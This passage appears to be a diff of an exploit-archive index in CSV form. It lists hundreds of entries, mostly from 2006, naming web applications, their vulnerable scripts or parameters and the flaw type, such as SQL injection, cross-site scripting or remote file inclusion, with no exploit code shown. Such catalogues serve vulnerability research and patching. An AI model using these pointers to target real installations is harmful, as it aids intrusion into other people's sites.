Calendar Manager Pro 1.0 1 - '/admin/edit.asp?ID' SQL Injection",2006-05-08,dj_eyes2005,webapps,asp, +27828,exploits/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/main.asp?date' Cross-Site Scripting",2006-05-08,dj_eyes2005,webapps,asp, +27829,exploits/php/webapps/27829.txt,"Phil's Bookmark Script - 'admin.php' Authentication Bypass",2006-05-08,alp_eren@ayyildiz.org,webapps,php, +27831,exploits/php/webapps/27831.txt,"Creative Software UK Community Portal 1.1 - 'ArticleView.php?article_id' SQL Injection",2006-05-08,r0t,webapps,php, +27832,exploits/php/webapps/27832.txt,"Creative Software UK Community Portal 1.1 - 'DiscView.php?forum_id' SQL Injection",2006-05-08,r0t,webapps,php, +27833,exploits/php/webapps/27833.txt,"Creative Software UK Community Portal 1.1 - 'Discussions.php?forum_id' SQL Injection",2006-05-08,r0t,webapps,php, +27834,exploits/php/webapps/27834.txt,"Creative Software UK Community Portal 1.1 - 'EventView.php?event_id' SQL Injection",2006-05-08,r0t,webapps,php, +27835,exploits/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple SQL Injections",2006-05-08,r0t,webapps,php, +27836,exploits/php/webapps/27836.txt,"Creative Software UK Community Portal 1.1 - 'DiscReply.php?mid' SQL Injection",2006-05-08,r0t,webapps,php, +27837,exploits/php/webapps/27837.txt,"EvoTopsite 2.0 - 'index.php' Multiple SQL Injections",2006-05-08,"Hamid Ebadi",webapps,php, +27838,exploits/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - 'index.php?pfad' Arbitrary Directory Listing",2006-05-08,d4igoro,webapps,php, +27839,exploits/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php?pfad' Arbitrary Directory Listing",2006-05-08,d4igoro,webapps,php, +27840,exploits/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 - 'index.php?pfad' Cross-Site Scripting",2006-05-08,d4igoro,webapps,php, +27841,exploits/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php?id' Cross-Site Scripting",2006-05-08,d4igoro,webapps,php, +27842,exploits/asp/webapps/27842.txt,"MultiCalendars 3.0 - 'All_calendars.asp' SQL Injection",2006-05-09,Dj_Eyes,webapps,asp, +27843,exploits/php/webapps/27843.txt,"MyBB 1.1.1 - 'showthread.php' SQL Injection",2006-05-09,Breeeeh,webapps,php, +27844,exploits/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - 'Moreinfo.asp' Cross-Site Scripting",2006-05-09,Dj_Eyes,webapps,asp, +27845,exploits/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion",2006-05-09,ReZEN,webapps,php, +27846,exploits/asp/webapps/27846.txt,"EImagePro - 'subList.asp?CatID' SQL Injection",2006-05-09,Dj_Eyes,webapps,asp, +27848,exploits/php/webapps/27848.txt,"EImagePro - 'view.asp?Pic' SQL Injection",2006-05-09,Dj_Eyes,webapps,php, +27849,exploits/asp/webapps/27849.txt,"EDirectoryPro - 'Search_result.asp' SQL Injection",2006-05-09,Dj_Eyes,webapps,asp, +27853,exploits/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - 'Results.cfm' SQL Injection",2006-04-25,r0t,webapps,cfm, +27858,exploits/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' Cross-Site Scripting",2006-05-11,sn4k3.23,webapps,php, +27859,exploits/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Cross-Site Scripting",2006-05-12,Kiki,webapps,php, +27863,exploits/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,webapps,php, +27864,exploits/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php?rep' Cross-Site Scripting",2006-05-13,"Morocco Security Team",webapps,php, +27865,exploits/php/webapps/27865.txt,"Gphotos 1.4/1.5 - 'diapo.php?rep' Cross-Site Scripting",2006-05-13,"Morocco Security Team",webapps,php, +27866,exploits/php/webapps/27866.txt,"Gphotos 1.4/1.5 - 'affich.php?image' Cross-Site Scripting",2006-05-13,"Morocco Security Team",webapps,php, +27867,exploits/php/webapps/27867.txt,"Gphotos 1.4/1.5 - 'index.php?rep' Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",webapps,php, +27868,exploits/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 - 'CFG[popphoto_base_path]' Remote File Inclusion",2006-05-15,VietMafia,webapps,php, +27869,exploits/php/webapps/27869.txt,"PHP Script Tools PSY Auction - 'item.php?id' SQL Injection",2006-05-15,Luny,webapps,php, +27870,exploits/php/webapps/27870.txt,"PHP Script Tools PSY Auction - 'email_request.php?user_id' Cross-Site Scripting",2006-05-15,Luny,webapps,php, +27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php, +27872,exploits/php/webapps/27872.txt,"PhpVibe 3.1 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php, +27876,exploits/php/webapps/27876.txt,"MusicBox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,webapps,php, +27878,exploits/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",webapps,hardware, +27879,exploits/php/webapps/27879.txt,"Joomla! Component com_virtuemart 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",webapps,php, +27880,exploits/php/webapps/27880.pl,"RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion",2006-05-15,Mr.CrackerZ,webapps,php, +27881,exploits/php/webapps/27881.txt,"PHPODP 1.5 - 'ODP.php' Cross-Site Scripting",2006-05-15,Kiki,webapps,php, +27883,exploits/php/webapps/27883.txt,"MonoChat 1.0 - HTML Injection",2005-05-15,X-BOY,webapps,php, +27884,exploits/php/webapps/27884.txt,"Confixx 3.0/3.1 - 'index.php' Cross-Site Scripting",2006-05-15,LoK-Crew,webapps,php, +27885,exploits/php/webapps/27885.txt,"PHPRemoteView - 'PRV.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,webapps,php, +27886,exploits/php/webapps/27886.txt,"Sphider 1.3 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,webapps,php, +27888,exploits/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",webapps,java, +27889,exploits/php/webapps/27889.txt,"BoastMachine 3.1 - 'admin.php' Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",webapps,php, +27890,exploits/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,webapps,asp, +27895,exploits/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - 'Lshop.cgi' SQL Injection",2006-05-18,l0om,webapps,cgi, +27896,exploits/asp/webapps/27896.txt,"ASPBB 0.5.2 - 'default.asp?action' Cross-Site Scripting",2006-05-18,TeufeL,webapps,asp, +27897,exploits/asp/webapps/27897.txt,"ASPBB 0.5.2 - 'profile.asp?get' Cross-Site Scripting",2006-05-18,TeufeL,webapps,asp, +27898,exploits/asp/webapps/27898.txt,"CodeAvalanche News 1.2 - 'default.asp' SQL Injection",2006-05-19,omnipresent,webapps,asp, +27899,exploits/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 - 'DC.php' SQL Injection",2006-05-19,Luny,webapps,php, +27900,exploits/php/webapps/27900.txt,"Artmedic NewsLetter 4.1 - 'Log.php' Remote Script Execution",2006-05-19,C.Schmitz,webapps,php, +27904,exploits/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x / DoceboKms 3.0.3 / Docebo CMS 3.0.x - Multiple Remote File Inclusions",2006-05-23,Kacper,webapps,php, +27905,exploits/php/webapps/27905.txt,"DoceboLms 2.0.x - 'Lang' Multiple Remote File Inclusions",2006-05-26,beford,webapps,php, +27907,exploits/php/webapps/27907.txt,"SaPHPLesson 2.0 - 'show.php' SQL Injection",2006-05-27,SwEET-DeViL,webapps,php, +27908,exploits/php/webapps/27908.txt,"Chipmunk 1.4 - 'Guestbook index.php' Cross-Site Scripting",2006-05-27,black-code,webapps,php, +27909,exploits/php/webapps/27909.txt,"Chipmunk Directory - 'index.php' Cross-Site Scripting",2006-05-27,black-code,webapps,php, +27910,exploits/php/webapps/27910.txt,"AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-27,black-code,webapps,php, +27911,exploits/php/webapps/27911.txt,"vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,black-code,webapps,php, +27912,exploits/php/webapps/27912.txt,"CoolPHP - 'index.php' Cross-Site Scripting",2006-05-27,black-code,webapps,php, +27913,exploits/asp/webapps/27913.txt,"Mini-NUKE 2.3 - 'Your_Account.asp' Multiple SQL Injections",2006-05-29,"Mustafa Can Bjorn",webapps,asp, +27916,exploits/php/webapps/27916.txt,"Photoalbum B&W 1.3 - 'index.php' Cross-Site Scripting",2006-05-29,black-code,webapps,php, +27917,exploits/php/webapps/27917.txt,"TikiWiki 1.9 - 'tiki-lastchanges.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-29,Blwood,webapps,php, +27918,exploits/asp/webapps/27918.txt,"ASPBB 0.5.2 - 'Perform_search.asp' Cross-Site Scripting",2006-05-29,"Mustafa Can Bjorn",webapps,asp, +27919,exploits/php/webapps/27919.txt,"Geeklog 1.4 - Multiple Input Validation Vulnerabilities",2006-05-11,trueend5,webapps,php, +27920,exploits/php/webapps/27920.txt,"EVA-Web 2.1.2 - 'article-album.php3?debut_image' Cross-Site Scripting",2006-05-30,r0t,webapps,php, +27921,exploits/php/webapps/27921.txt,"EVA-Web 2.1.2 - 'rubrique.php3?date' Cross-Site Scripting",2006-05-30,r0t,webapps,php, +27922,exploits/php/webapps/27922.txt,"EVA-Web 2.1.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-30,r0t,webapps,php, +27924,exploits/php/webapps/27924.txt,"ToendaCMS 0.7 - 'index.php' Cross-Site Scripting",2006-05-31,Jokubas,webapps,php, +27926,exploits/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - 'index.php' Local File Inclusion",2006-05-31,darkgod,webapps,php, +27927,exploits/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Inclusions",2005-05-31,ERNE,webapps,php, +27928,exploits/php/webapps/27928.txt,"osTicket 1.x - 'Open_form.php' Remote File Inclusion",2006-05-31,Sweet,webapps,php, +27929,exploits/php/webapps/27929.txt,"vBulletin 3.0.10 - 'Portal.php' SQL Injection",2006-05-31,SpC-x,webapps,php, +27932,exploits/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 - Unauthorized Access",2006-05-01,omnipresent,webapps,asp, +27933,exploits/php/webapps/27933.txt,"Tekno.Portal - 'Bolum.php' SQL Injection",2006-06-01,SpC-x,webapps,php, +27934,exploits/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,webapps,php, +27994,exploits/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 - 'publication_index.php?tf_lang' Cross-Site Scripting",2006-06-07,r0t,webapps,php, +27995,exploits/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 - 'group_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,webapps,php, +27996,exploits/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 - 'user_index.php?tf_lastname' Cross-Site Scripting",2006-06-07,r0t,webapps,php, +27997,exploits/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 - 'list_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,webapps,php, +28394,exploits/php/webapps/28394.pl,"Fusionphp Fusion News 3.7 - 'index.php' Remote File Inclusion",2006-08-16,O.U.T.L.A.W,webapps,php, +27945,exploits/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,webapps,asp, +27946,exploits/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,webapps,php, +27947,exploits/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,webapps,php, +27948,exploits/php/webapps/27948.txt,"Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion",2006-06-02,brokejunker,webapps,php, +27949,exploits/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - 'approb.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,webapps,php, +27950,exploits/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - 'vacadmb.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,webapps,php, +27951,exploits/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - 'vacadma.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,webapps,php, +27952,exploits/php/webapps/27952.txt,"Ovidentia 5.6.x/5.8 - 'vacadm.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,webapps,php, +27953,exploits/php/webapps/27953.txt,"Ovidentia 5.6.x/5.8 - 'statart.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,webapps,php, +27954,exploits/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - 'search.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,webapps,php, +27955,exploits/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - 'posts.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,webapps,php, +27956,exploits/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - 'options.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,webapps,php, +27958,exploits/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,webapps,php, +27959,exploits/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,webapps,php, +27960,exploits/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - 'Viewmsg.asp' SQL Injection",2006-06-02,ajann,webapps,asp, +27961,exploits/php/webapps/27961.txt,"phpBB 2.0.x - 'template.php' Remote File Inclusion",2006-06-02,Canberx,webapps,php, +27962,exploits/php/webapps/27962.txt,"IBWd Guestbook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,webapps,php, +27963,exploits/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,webapps,php, +27964,exploits/php/webapps/27964.txt,"CoolForum 0.x - 'editpost.php' SQL Injection",2006-06-05,DarkFig,webapps,php, +27979,exploits/php/webapps/27979.html,"myNewsletter 1.1.2 - 'Username' SQL Injection",2006-06-05,FarhadKey,webapps,php, +27980,exploits/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 - 'comments.php' SQL Injection",2006-06-05,ajann,webapps,php, +27982,exploits/php/webapps/27982.txt,"GANTTy 1.0.3 - 'index.php' Cross-Site Scripting",2006-06-06,Luny,webapps,php, +27985,exploits/php/webapps/27985.txt,"AZ Photo Album Script Pro - Cross-Site Scripting",2006-05-23,Luny,webapps,php, +27988,exploits/php/webapps/27988.py,"MiraksGalerie 2.62 - 'galimage.lib.php?listconfigfile[0]' Remote File Inclusion",2006-06-07,"Federico Fazzi",webapps,php, +27989,exploits/php/webapps/27989.txt,"MiraksGalerie 2.62 - 'galsecurity.lib.php?listconfigfile[0]' Remote File Inclusion",2006-06-07,"Federico Fazzi",webapps,php, +27998,exploits/php/webapps/27998.txt,"Open Business Management 1.0.3 pl1 - 'company_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,webapps,php, +27999,exploits/php/webapps/27999.txt,"Baby Katie Media VSReal and VScal 1.0 - 'index.php?lid' Cross-Site Scripting",2006-06-09,Luny,webapps,php, +28000,exploits/php/webapps/28000.txt,"Baby Katie Media VSReal and VScal 1.0 - 'myslideshow.php?title' Cross-Site Scripting",2006-06-09,Luny,webapps,php, +28002,exploits/asp/webapps/28002.txt,"KAPhotoservice 7.5 - 'album.asp?cat' Cross-Site Scripting",2006-06-09,r0t,webapps,asp, +28003,exploits/asp/webapps/28003.txt,"KAPhotoservice 7.5 - 'albums.asp?albumid' Cross-Site Scripting",2006-06-09,r0t,webapps,asp, +28004,exploits/asp/webapps/28004.txt,"KAPhotoservice 7.5 - 'edtalbum.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-06-09,r0t,webapps,asp, +28006,exploits/php/webapps/28006.txt,"NPDS 5.10 - Multiple Input Validation Vulnerabilities",2006-06-12,DarkFig,webapps,php, +28008,exploits/php/webapps/28008.txt,"Adaptive Website Framework 1.11 - Remote File Inclusion",2006-06-12,"Federico Fazzi",webapps,php, +28009,exploits/php/webapps/28009.txt,"Five Star Review Script - 'index2.php?sort' Cross-Site Scripting",2006-06-12,Luny,webapps,php, +28010,exploits/php/webapps/28010.txt,"Five Star Review Script - 'report.php?item_id' Cross-Site Scripting",2006-06-12,Luny,webapps,php, +28011,exploits/php/webapps/28011.txt,"iFoto 0.20 - 'index.php' Cross-Site Scripting",2006-06-12,Luny,webapps,php, +28012,exploits/php/webapps/28012.txt,"Foing 0.x - Remote File Inclusion",2006-06-12,Darkfire,webapps,php, +28013,exploits/php/webapps/28013.txt,"SixCMS 6.0 - 'list.php' Cross-Site Scripting",2006-06-12,Aesthetico,webapps,php, +28014,exploits/php/webapps/28014.txt,"SixCMS 6.0 - 'detail.php' Directory Traversal",2006-06-12,Aesthetico,webapps,php, +28015,exploits/php/webapps/28015.txt,"iFusion iFlance 1.1 - Multiple Input Validation Vulnerabilities",2006-06-12,Luny,webapps,php, +28016,exploits/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusions",2006-06-13,R@1D3N,webapps,php, +28017,exploits/php/webapps/28017.txt,"CEScripts (Multiple Scripts) - Cross-Site Scripting",2006-06-13,Luny,webapps,php, +28018,exploits/php/webapps/28018.txt,"VBZoom 1.0/1.1 - Multiple SQL Injections",2006-06-13,"CrAzY CrAcKeR",webapps,php, +28019,exploits/php/webapps/28019.txt,"Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion",2006-06-13,SpC-x,webapps,php, +28020,exploits/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'index.php?imgdir' Cross-Site Scripting",2006-06-13,black-cod3,webapps,php, +28021,exploits/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-13,black-cod3,webapps,php, +28022,exploits/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",webapps,php, +28023,exploits/php/webapps/28023.txt,"Confixx 3.0/3.1 - 'FTP_index.php' Cross-Site Scripting",2006-06-14,kr4ch,webapps,php, +28024,exploits/php/webapps/28024.txt,"phpBB - 'BBRSS.php' Remote File Inclusion",2006-06-14,SpC-x,webapps,php, +28025,exploits/php/webapps/28025.txt,"RahnemaCo - 'page.php' Remote File Inclusion",2006-06-14,Breeeeh,webapps,php, +28027,exploits/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusions",2006-06-14,"Federico Fazzi",webapps,php, +28028,exploits/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,webapps,php, +28060,exploits/php/webapps/28060.txt,"Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-19,Luny,webapps,php, +28059,exploits/php/webapps/28059.txt,"SaphpLesson 1.1/2.0/3.0 - Multiple SQL Injections",2006-06-19,"CrAzY CrAcKeR",webapps,php, +28031,exploits/php/webapps/28031.txt,"HotPlug CMS 1.0 - 'Login1.php' Cross-Site Scripting",2006-06-15,"Federico Fazzi",webapps,php, +28032,exploits/php/webapps/28032.txt,"MPCS 0.2 - 'comment.php' Cross-Site Scripting",2006-03-06,Luny,webapps,php, +28033,exploits/php/webapps/28033.txt,"VBZoom 1.11 - 'forum.php' SQL Injection",2006-06-15,CrAsh_oVeR_rIdE,webapps,php, +28034,exploits/php/webapps/28034.txt,"Ji-takz - Remote File Inclusion",2006-06-16,SpC-x,webapps,php, +28035,exploits/php/webapps/28035.txt,"mcGuestbook 1.3 - 'admin.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,webapps,php, +28036,exploits/php/webapps/28036.txt,"mcGuestbook 1.3 - 'ecrire.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,webapps,php, +28037,exploits/php/webapps/28037.txt,"mcGuestbook 1.3 - 'lire.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,webapps,php, +28038,exploits/php/webapps/28038.txt,"Indexu 5.0.1 - Multiple Remote File Inclusions",2006-06-16,CrAsh_oVeR_rIdE,webapps,php, +28039,exploits/php/webapps/28039.txt,"dotWidget for articles 2.0 - 'showcatpicks.php?file_path' Remote File Inclusion",2006-06-03,SwEET-DeViL,webapps,php, +28040,exploits/php/webapps/28040.txt,"dotWidget for articles 2.0 - 'showarticle.php?file_path' Remote File Inclusion",2006-06-03,SwEET-DeViL,webapps,php, +28041,exploits/php/webapps/28041.txt,"dotWidget for articles 2.0 - '/admin/authors.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,webapps,php, +28042,exploits/php/webapps/28042.txt,"dotWidget for articles 2.0 - '/admin/articles.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,webapps,php, +28043,exploits/php/webapps/28043.txt,"dotWidget for articles 2.0 - '/admin/index.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,webapps,php, +28045,exploits/php/webapps/28045.txt,"dotWidget for articles 2.0 - '/admin/categories.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,webapps,php, +28063,exploits/php/webapps/28063.txt,"e107 0.7.5 - 'search.php' Cross-Site Scripting",2006-06-19,securityconnection,webapps,php, +28064,exploits/php/webapps/28064.txt,"Qto File Manager 1.0 - 'index.php' Cross-Site Scripting",2006-03-06,alijsb,webapps,php, +28066,exploits/php/webapps/28066.txt,"Singapore 0.9.x/0.10 - Multiple Traversal Arbitrary File Access",2006-06-19,simo64,webapps,php, +28067,exploits/php/webapps/28067.txt,"Singapore 0.9.x/0.10 - 'index.php?template' Cross-Site Scripting",2006-06-19,simo64,webapps,php, +28068,exploits/php/webapps/28068.txt,"V3 Chat Instant Messenger - '/mail/index.php?id' Cross-Site Scripting",2006-06-20,Luny,webapps,php, +28069,exploits/php/webapps/28069.txt,"V3 Chat Instant Messenger - '/mail/reply.php?id' Cross-Site Scripting",2006-06-20,Luny,webapps,php, +28070,exploits/php/webapps/28070.txt,"V3 Chat Instant Messenger - 'online.php?site_id' Cross-Site Scripting",2006-06-20,Luny,webapps,php, +28071,exploits/php/webapps/28071.txt,"V3 Chat Instant Messenger - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-20,Luny,webapps,php, +28072,exploits/php/webapps/28072.txt,"V3 Chat Instant Messenger - 'profile.php?site_id' Cross-Site Scripting",2006-06-20,Luny,webapps,php, +28073,exploits/php/webapps/28073.txt,"V3 Chat Instant Messenger - 'profileview.php?membername' Cross-Site Scripting",2006-06-20,Luny,webapps,php, +28074,exploits/php/webapps/28074.txt,"V3 Chat Instant Messenger - 'expire.php?cust_name' Cross-Site Scripting",2006-06-20,Luny,webapps,php, +28075,exploits/php/webapps/28075.txt,"V3 Chat Instant Messenger - 'mycontacts.php' membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,webapps,php, +28076,exploits/php/webapps/28076.txt,"vBulletin 3.0.9/3.5.x - 'member.php' Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,webapps,php, +28078,exploits/php/webapps/28078.txt,"e107 0.7.5 - 'Subject' HTML Injection",2006-06-21,"EllipSiS Security",webapps,php, +28086,exploits/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - 'Error_msg' Cross-Site Scripting",2006-06-21,"Charles Hooper",webapps,asp, +28088,exploits/php/webapps/28088.txt,"PHP Event Calendar 4.2 - SQL Injection",2006-06-22,Silitix,webapps,php, +28089,exploits/php/webapps/28089.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'newthread.php?boardid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",webapps,php, +28090,exploits/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'report.php?postid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",webapps,php, +28091,exploits/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'showmods.php?boardid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",webapps,php, +28092,exploits/php/webapps/28092.txt,"MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection",2006-06-22,imei,webapps,php, +28093,exploits/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection",2006-06-22,"EllipSiS Security",webapps,php, +28094,exploits/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection",2006-06-22,"EllipSiS Security",webapps,php, +28095,exploits/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection",2006-06-22,"EllipSiS Security",webapps,php, +28096,exploits/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection",2006-06-22,"EllipSiS Security",webapps,php, +28097,exploits/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",webapps,php, +28098,exploits/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusions",2006-06-22,Shm,webapps,php, +28101,exploits/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,webapps,php, +28102,exploits/php/webapps/28102.txt,"Winged Gallery 1.0 - 'Thumb.php' Cross-Site Scripting",2006-06-24,Luny,webapps,php, +28104,exploits/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",webapps,php, +28105,exploits/php/webapps/28105.txt,"eNpaper1 - 'Root_Header.php' Remote File Inclusion",2006-06-26,almaster,webapps,php, +28106,exploits/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusions",2006-06-16,Kw3[R]Ln,webapps,php, +28107,exploits/php/webapps/28107.txt,"cPanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,webapps,php, +28108,exploits/php/webapps/28108.txt,"MyMail 1.0 - 'login.php' Cross-Site Scripting",2006-06-26,botan,webapps,php, +28109,exploits/php/webapps/28109.txt,"Usenet 0.5 - 'index.php' Cross-Site Scripting",2006-06-23,Luny,webapps,php, +28110,exploits/php/webapps/28110.txt,"MVNForum Activatemember 1.0 - Cross-Site Scripting",2006-06-26,r0t,webapps,php, +28111,exploits/php/webapps/28111.txt,"OpenGuestbook 0.5 - 'header.php?title' Cross-Site Scripting",2006-06-26,simo64,webapps,php, +28112,exploits/php/webapps/28112.txt,"OpenGuestbook 0.5 - 'view.php?offset' SQL Injection",2006-06-26,simo64,webapps,php, +28113,exploits/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 - OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,webapps,php, +28114,exploits/php/webapps/28114.txt,"CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,webapps,php, +28115,exploits/php/webapps/28115.txt,"MF Piadas 1.0 - 'admin.php' Cross-Site Scripting",2006-06-27,botan,webapps,php, +28116,exploits/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,webapps,java, +28117,exploits/php/webapps/28117.txt,"MF Piadas 1.0 - 'admin.php' Remote File Inclusion",2006-06-27,botan,webapps,php, +28119,exploits/php/webapps/28119.txt,"vCard PRO - 'gbrowse.php?cat_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",webapps,php, +28120,exploits/php/webapps/28120.txt,"vCard PRO - 'rating.php?card_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",webapps,php, +28121,exploits/php/webapps/28121.txt,"vCard PRO - 'create.php?card_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",webapps,php, +28122,exploits/php/webapps/28122.txt,"vCard PRO - 'search.php?event_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",webapps,php, +28124,exploits/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,webapps,php, +28125,exploits/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,webapps,php, +28126,exploits/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php?value' SQL Injection",2013-09-06,"Easy Laster",webapps,php, +28129,exploits/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass",2013-09-06,shiZheni,webapps,php, +28131,exploits/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",webapps,php, +28132,exploits/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Cross-Site Scripting 